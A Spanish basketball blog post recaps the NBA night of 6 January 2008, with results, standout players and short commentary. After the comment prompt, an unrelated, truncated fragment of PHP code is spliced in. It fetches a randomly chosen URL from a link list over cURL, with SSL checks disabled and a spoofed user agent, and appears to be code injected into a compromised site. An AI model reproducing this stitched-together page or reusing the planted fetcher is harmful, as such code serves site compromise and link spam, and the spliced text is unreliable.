La crónica (06/01/08)

07 de January de 2008 por MagicJohnson32

 

El domingo deparó una jornada larga, que se inició en Toronto a media tarde y se cerró en Los Angeles a eso de las 6 de la mañana, horas españolas. En Canadá vieron como un partido que parecía decidido en favor de los locales acabó en manos de LeBron James, autor de 24 puntos en el último periodo. Washington sigue ganando partidos sin Gilbert Arenas, con Caron Butler como estrella y autor anoche de 33 puntos ante los débiles Sonics. El regreso de Ginóbili, junto a las actuaciones de Duncan y Parker, impulsó a los Spurs a un nuevo triunfo en pista de los Clippers, pese a las magníficas estadísticas que firmó Kaman. Los Mavs, liderados por Nowitzki, no se apiadaron de los Wolves, que siguen anclados en 4 victorias. En Memphis, el trío Miller-Gay-Gasol funcionó a la perfección y hundió un poco más a los Heat, en los que Wade salió como suplente y falló dos tiros libres a 1 minutos para el final con 94-92 en el marcador. En Charlotte, los Bucks contaron con el mejor Charlie Bell del año y un gran Bogut para llevarse el triunfo pese a la baja de Redd. En Denver, Iverson recordó a los Sixers lo bueno que puede llegar a ser y dio la victoria a su equipo con 38 puntos. Y, por último, Lakers y Pacers cerraron la jornada con una nueva demostración de poderío a cargo de Andrew Bynum para un triunfo que sitúa a los Lakers pisando los talones de los Suns en la Pacific Division.

Tras el resumen en palabras e imágenes, vamos con algunos detalles que nos dejó la madrugada: Resultados:

Cavs 93 – 90 Raptors

Sonics 86 – 108 Wizards

Spurs 88 – 82 Clippers

Mavs 101 – 78 T’Wolves

Heat 94 – 101 Grizzlies

Bucks 93 – 89 Bobcats

Sixers 96 – 109 Nuggets

Pacers 96 – 112 Lakerslebronraptors

El MVP de la noche: 39 puntos, 11 rebotes y 8 asistencias. Estas han sido las estadísticas de King James esta noche. Durante los 3 primeros cuartos su actuación fue de lo más normal, pero llegó el último cuarto, el de la verdad, en el que surgen los campeones para decidir partidos y Lebron destapó la caja de los truenos. Nada más y nada menos que 24 puntos para remontar a los Raptors y dar un partido más a su equipo.cbellbobcats

El rookie de la noche: Jugando Kevin Durant es complicado que el galardón de rookie de la noche recaiga en otro jugador pero ya hemos comentado aquí mismo que esperamos de Durant mucho más en otros aspectos que no sea el anotador. Así que esta noche es Al Thorton, jugador de los Clippers, el elegido después de anotar 17 puntos y capturar 8 rebotes.

La sorpresa de la noche: Hay jugadores que atesoran una gran calidad y que además lo han demostrado en varias ocasiones, pero que, por razones incomprensibles, son arrinconados por sus entrenadores noche tras noche. Este es el caso de Charlie Bell, que no está viviendo su mejor temporada desde que en verano declaró su interés por abandonar la franquicia y volar a Miami. Hoy, 27 puntos y 6 rebotes aprovechando la ausencia de Michael Redd.

La decepción de la noche: Andrea Bargnani ha demostrado ser un jugador tremendamente irregular, capaz de lo mejor y de lo peor, aparentemente carente de carácter y lucha, pero con un talento envidiable. Hoy ha resultado ser uno de esos días malos en los que, decidido a jugar lejos de la canasta, ha acabado con pocos puntos, pocos rebotes y poco protagonismo en el juego de su equipo. Se esperan días mejores del italiano.

Y para acabar, como de costumbre, las 10 mejores jugadas de la noche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>